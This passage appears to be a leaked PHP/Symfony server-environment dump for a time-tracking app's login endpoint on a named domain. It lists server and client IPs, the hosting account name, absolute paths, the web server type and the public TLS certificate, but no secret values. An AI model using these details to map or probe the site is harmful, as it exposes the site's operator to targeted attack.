oww3k2Q6rAS5KBF7NQIDAQABo4ICKTCCAiUwDgYDVR0PAQH/BAQDAgWgMBMGA1Ud\n
JQQMMAoGCCsGAQUFBwMBMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFHMnuO7xk4UI\n
BxrIaa3dlLLMx+gmMB8GA1UdIwQYMBaAFAC1KfItjm8x6JtMrXg++tzpDNHSMDMG\n
CCsGAQUFBwEBBCcwJTAjBggrBgEFBQcwAoYXaHR0cDovL3IxMi5pLmxlbmNyLm9y\n
Zy8wJQYDVR0RBB4wHIIKdHQubXVleC5kZYIOd3d3LnR0Lm11ZXguZGUwEwYDVR0g\n
BAwwCjAIBgZngQwBAgEwLQYDVR0fBCYwJDAioCCgHoYcaHR0cDovL3IxMi5jLmxl\n
bmNyLm9yZy80LmNybDCCAQ4GCisGAQQB1nkCBAIEgf8EgfwA+gB3ABaDLavwqSUP\n
D/A6pUX/yL/II9CHS/YEKSf45x8zE/X6AAABnTXUw14AAAQDAEgwRgIhAJiTomg/\n
xkmzjSiycHR49XxduqT6w4GHpO6x12iKu9j8AiEAodPLNy5zEtABNy7jaC2SyQcx\n
BrNrKI4/oZkOnoPkl9gAfwBxfpXzwjiKbbHjhEk9MeFaqWIIdi1CAOAFDNBntaZh\n
4gAAAZ011MOeAAgAAAUADNKAtAQDAEgwRgIhALSMvgKhntcivKq4EOrxWR0qGggR\n
BB2UPLdjM/bG60V8AiEA9QWr56c4jyTUOXIwweymANNxdfIplihAhD/heNGkABMw\n
DQYJKoZIhvcNAQELBQADggEBAKWqhAeQsONoS2k3eO5ImaDDLnwGvkxaBxpcud/9\n
lBulifvlkR+FmbO1oNBqrSjyUCHgQAVXnSFxebzZ3nbf0dBGVop+cjBJ5Negf63y\n
HGvwKdxKeMmK+D6GOx+VnNZNa0SFYB5bmtiSxo5DKif85a1I8M7JJNu/k9WKyaOG\n
WL3OAZTgZwXEz6GYD8i5V38SwL1CsCf3h8yrMLw48YSu3L9sCspWWYejHk3Geh/V\n
M9Nvb/217ywGml3OJl/l6CXNKb7kR8T10RKg97CQBNUvaTZo8yuNYTw/UpT+t9FI\n
0JKjx0g8TBLPNG1p7tYx0dI97uQIOlkKMi/5bX+pZXftxWc=\n
-----END CERTIFICATE-----\n
"""
REDIRECT_SSL_TLS_SNI
"tt.muex.de"
REDIRECT_STATUS
"200"
REDIRECT_UNIQUE_ID
"ac_SQ6XG0A68SFLW4m2y5gAAABY"
REDIRECT_URL
"/login"
REMOTE_ADDR
"3.79.7.137"
REMOTE_PORT
"48978"
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"https"
REQUEST_TIME
1775227459
REQUEST_TIME_FLOAT
1775227459.36
REQUEST_URI
"/login"
SCRIPT_FILENAME
"/www/htdocs/w0186f22/tt.muex.de/timetracker/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"85.13.148.156"
SERVER_ADMIN
"webmaster@tt.muex.de"
SERVER_NAME
"tt.muex.de"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
""
SERVER_SOFTWARE
"Apache"
SSL_CLIENT_CERT
""
SSL_SERVER_CERT
"""
-----BEGIN CERTIFICATE-----\n
MIIE/zCCA+egAwIBAgISBnpGHUxL26XlMI3yEzFbLFGDMA0GCSqGSIb3DQEBCwUA\n
MDMxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQwwCgYDVQQD\n
EwNSMTIwHhcNMjYwMzI4MTgwNTE5WhcNMjYwNjI2MTgwNTE4WjAVMRMwEQYDVQQD\n
Ewp0dC5tdWV4LmRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqmVl\n
xG9v1lhBQbuXDMdudS3Dyu2abUNwEh0p8H6SM0oBJuu/I85Ltn0ydCQUNDHyOZsJ\n
+Ec7eQPK5nyv1nkMjAbk33OUXwO/npNjueqrLwTFN1NRrnjVshva9HThS+PVGZyd\n
4G0QjxU3oA4nlIn+sd7UoTmjN1k2v7fksW+TpjmMGuGQ7PPgFIBDow+K0h23PqAU\n
bRxrxpfwdcsk7B+NWnl7oqQ75hhPSnbfWsZVqzN2Gavo/BM5GEPUZxsUZH1vOnwb\n
t0Uhte0gYuMZl4JknKYQw7wTajOxw8LGr5XMisMxbSbQrjyy+FLVQ4xs/vP/IgpA\n
oww3k2Q6rAS5KBF7NQIDAQABo4ICKTCCAiUwDgYDVR0PAQH/BAQDAgWgMBMGA1Ud\n
JQQMMAoGCCsGAQUFBwMBMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFHMnuO7xk4UI\n
BxrIaa3dlLLMx+gmMB8GA1UdIwQYMBaAFAC1KfItjm8x6JtMrXg++tzpDNHSMDMG\n
CCsGAQUFBwEBBCcwJTAjBggrBgEFBQcwAoYXaHR0cDovL3IxMi5pLmxlbmNyLm9y\n
Zy8wJQYDVR0RBB4wHIIKdHQubXVleC5kZYIOd3d3LnR0Lm11ZXguZGUwEwYDVR0g\n
BAwwCjAIBgZngQwBAgEwLQYDVR0fBCYwJDAioCCgHoYcaHR0cDovL3IxMi5jLmxl\n
bmNyLm9yZy80LmNybDCCAQ4GCisGAQQB1nkCBAIEgf8EgfwA+gB3ABaDLavwqSUP\n
D/A6pUX/yL/II9CHS/YEKSf45x8zE/X6AAABnTXUw14AAAQDAEgwRgIhAJiTomg/\n
xkmzjSiycHR49XxduqT6w4GHpO6x12iKu9j8AiEAodPLNy5zEtABNy7jaC2SyQcx\n
BrNrKI4/oZkOnoPkl9gAfwBxfpXzwjiKbbHjhEk9MeFaqWIIdi1CAOAFDNBntaZh\n
4gAAAZ011MOeAAgAAAUADNKAtAQDAEgwRgIhALSMvgKhntcivKq4EOrxWR0qGggR\n
BB2UPLdjM/bG60V8AiEA9QWr56c4jyTUOXIwweymANNxdfIplihAhD/heNGkABMw\n
DQYJKoZIhvcNAQELBQADggEBAKWqhAeQsONoS2k3eO5ImaDDLnwGvkxaBxpcud/9\n
lBulifvlkR+FmbO1oNBqrSjyUCHgQAVXnSFxebzZ3nbf0dBGVop+cjBJ5Negf63y\n
HGvwKdxKeMmK+D6GOx+VnNZNa0SFYB5bmtiSxo5DKif85a1I8M7JJNu/k9WKyaOG\n
WL3OAZTgZwXEz6GYD8i5V38SwL1CsCf3h8yrMLw48YSu3L9sCspWWYejHk3Geh/V\n
M9Nvb/217ywGml3OJl/l6CXNKb7kR8T10RKg97CQBNUvaTZo8yuNYTw/UpT+t9FI\n
0JKjx0g8TBLPNG1p7tYx0dI97uQIOlkKMi/5bX+pZXftxWc=\n
-----END CERTIFICATE-----\n
"""
SSL_TLS_SNI
"tt.muex.de"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,DATABASE_URL"
UNIQUE_ID
"ac_SQ6XG0A68SFLW4m2y5gAAABY"
USER
"w0186f22"
argc
0
argv
[]